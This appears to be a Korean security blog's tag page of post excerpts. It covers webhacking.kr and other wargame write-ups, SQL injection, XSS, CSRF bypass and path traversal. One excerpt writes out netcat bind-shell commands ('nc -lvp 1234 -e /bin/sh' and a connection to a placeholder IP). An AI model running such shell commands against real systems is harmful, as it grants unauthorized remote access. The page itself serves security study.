# webhacking

51개의 포스트

[Webhacking.kr-Challenge(old)] old-31

Challenge Old-31Webhacking old 31 문제 Write-Up 시작하겠습니다.

2022년 6월 9일
·
0개의 댓글

[Webhacking.kr] Challenge(old) - 18, 27

Webhacking.kr - Challenge(old) SQL Injection과 관련된 문제 18, 27번을 풀어보았습니다.

2022년 5월 31일
·
0개의 댓글

[Webhacking.kr] Challenge(old) - 32

Webhacking.kr - Challenge(old)에서 32번 문제를 selenium 모듈을 이용하여 풀어보았습니다.

2022년 5월 14일
·
0개의 댓글

[Webhacking.kr] Challenge(old) - 20

Webhacking.kr - Challenge(old)에서 20번 문제를 selenium 모듈을 이용하여 풀어보았습니다.

2022년 5월 14일
·
0개의 댓글

[Webhacking.kr] Challenge(old) - 10, 14, 16, 17

Webhacking.kr - Challenge(old)에서 Javascript와 관련된 10, 14, 16, 17번 문제를 풀어보았습니다.

2022년 5월 8일
·
0개의 댓글
post-thumbnail

💻Webhacking.kr Old 1번 문제 풀이💻

문제 💻 https://webhacking.kr/challenge/web-01/ list 📋 1번 문제를 옆에 php마크가 있다는 것을 보아 php를 보고 문제를 해결해야한다. source📑 해당 소스를 보고 조작하면 된다. 대부분 Post 방식으로의 조작으

2022년 4월 21일
·
0개의 댓글

E2E 개념 및 파라미터 암호화 우회

End to End Encryption = 종단간 암호화 정보를 발신할 때부터 수신할 때까지 암호화를 유지한 채로 전송하는 방식이다.종단간 암호화가 적용되지 않은 경우 발신원에서 암호화된 정보가 중간 서버에서 복호화된 뒤, 재암호화되어 수신원에게 전달되기 때문에 해독

2022년 3월 30일
·
0개의 댓글

XSS (Cross-Site Scripting)

크로스 사이트 스크립팅 공격은공격자가 악의적인 스크립트를 웹 애플리케이션에 삽입한 후웹 사용자의 웹 브라우저에서 해당 스크립트가 실행되도록 만드는 공격이다.다른 공격들은 취약점을 갖고 있는 서버측을 공격하지만XSS는 서버의 취약점을 이용하여 클라이언트측을 공격한다.기준

2022년 3월 30일
·
0개의 댓글

SQL Injection - 개념 및 공격 기법

보안상의 취약점을 이용하여, 임의의 SQL문을 주입하고 실행되게 하여 DB가 비정상적인 동작을 하도록 조작하는 행위OWASP TOP 10 중 첫 번째에 속해 있으며, 공격이 비교적 쉬운 편이고 공격에 성공할 경우 큰 피해를 입힐 수 있음인증 우회, 시스템 명령어 삽입,

2022년 3월 30일
·
0개의 댓글
post-thumbnail

Web 해킹에 대하여.. (드림핵 웹해킹 3강 Cookie & Session)

지난 번 웹 해킹의 기초 HTTP/HTTPS protocol 에 이어 웹 브라우저에서 배우는 부분들에 대해 공부를 하고 오늘은 이어 3강 쿠키와 세션에 대해서 공부를 했다. 앞부분 복습 차 다시 한번 설명하자면, 이번에 학습한 쿠키와 세션은 F12 키를 활용해 개발자

2022년 3월 19일
·
0개의 댓글
post-thumbnail

Web 해킹에 대하여.. (드림핵 웹해킹 1,2강 Web hacking introduction, Background)

잠시 자격증 시험 준비에 밀렸던 과제를 열심히 하느라, 한 2일정도 공부했던 부분을 기록을 하지 못했다. 그래서 오늘은 하루에 한 강의씩 공부했던 부분, (드림핵)이라는 플랫폼을 활용해서 여러개를 동시에 공부하려고 하는데, 벽을 느끼기 전까지는 웹해킹을 먼저 시작해보

2022년 3월 17일
·
0개의 댓글

[Web Hacking] Python - requests 라이브러리

Python의 HTTP 클라이언트 라이브러리입니다.

2022년 3월 16일
·
0개의 댓글
post-thumbnail

[Wargame] HackCTF-Login

HackCTF - Web - Login

2022년 3월 5일
·
1개의 댓글
post-thumbnail

Elasticsearch Logstash Kibana (ELK) 로 웹서버에 로거 연동

작년 2학기 학교 수업 때 "악성 pdf 탐지 웹 구현" 프로젝트를 진행했었는데, 잊기 전에 elk 로거 관련해서 기록을 남겨보고자 한다. 임시 글로 썩고 있었는데 이제야 올린다니 반성해야겠다. 우선 우리의 악성 pdf 탐지 웹은 다음과 같은 원리로 구상되었다.

2022년 1월 24일
·
0개의 댓글
post-thumbnail

webhacking.kr 2번

webhacking.kr 2번 write-up

2021년 12월 16일
·
0개의 댓글
post-thumbnail

webhacking.kr 1번

webhacking.kr 1번문제 write-up

2021년 12월 16일
·
0개의 댓글
post-thumbnail

flask-wtf CSRFProtect 분석

flask에서 CSRF token을 적용할 때에 거의 대부분 사용하는 것으로 보이는 flask-wft의 CSRFProtect를 분석해보았다.ssti 등으로 flask 전역 변수를 변경할 수 있다면 CSRF를 우회할 수 있을 것으로 보인다.ssti가 될 때 CSRF를 굳

2021년 10월 30일
·
0개의 댓글
post-thumbnail

HTTP HEAD method exploit (Flask CSRF 우회하기)

dreamhack을 풀다가 처음 알게 되어서,블로그1, 블로그2 에서 심화 정보를 배우고,변형 문제 구현까지 해보았다. HTTP HEAD method는 GET method가 허용되는 곳에는 반드시 허용되어야 하는데, 이러한 특징을 고려하지 않고 개발을 하였기 때문에 취

2021년 10월 30일
·
0개의 댓글

nc 이용하기(바인드쉘, 리버스쉘, 커맨드 실행)

nc 명령어를 이용해서 바인드쉘, 리버스쉘을 이용해보자.바인드쉘 : 일반적인 연결. 클라이언트가 서버에 접속.서버 : nc -lvp 1234 -e /bin/sh클라이언트 : nc 12.34.56.78 1234리버스쉘 : 반대로 연결. 서버가 클라이언트에 접속서버 : n

2021년 10월 30일
·
0개의 댓글
post-thumbnail

WebGoat_Path traversal

path-traversal-secret.jpg 파일을 찾아라!show random cat picture버튼을 클릭하면 고양이 사진이 변경된다.고양이 사진이 변경되는 과정을 버프스위트로 인터셉트 한다.location 부분의 ?id=6.png 부분이 계속 변경된다. 따라서

2021년 10월 28일
·
0개의 댓글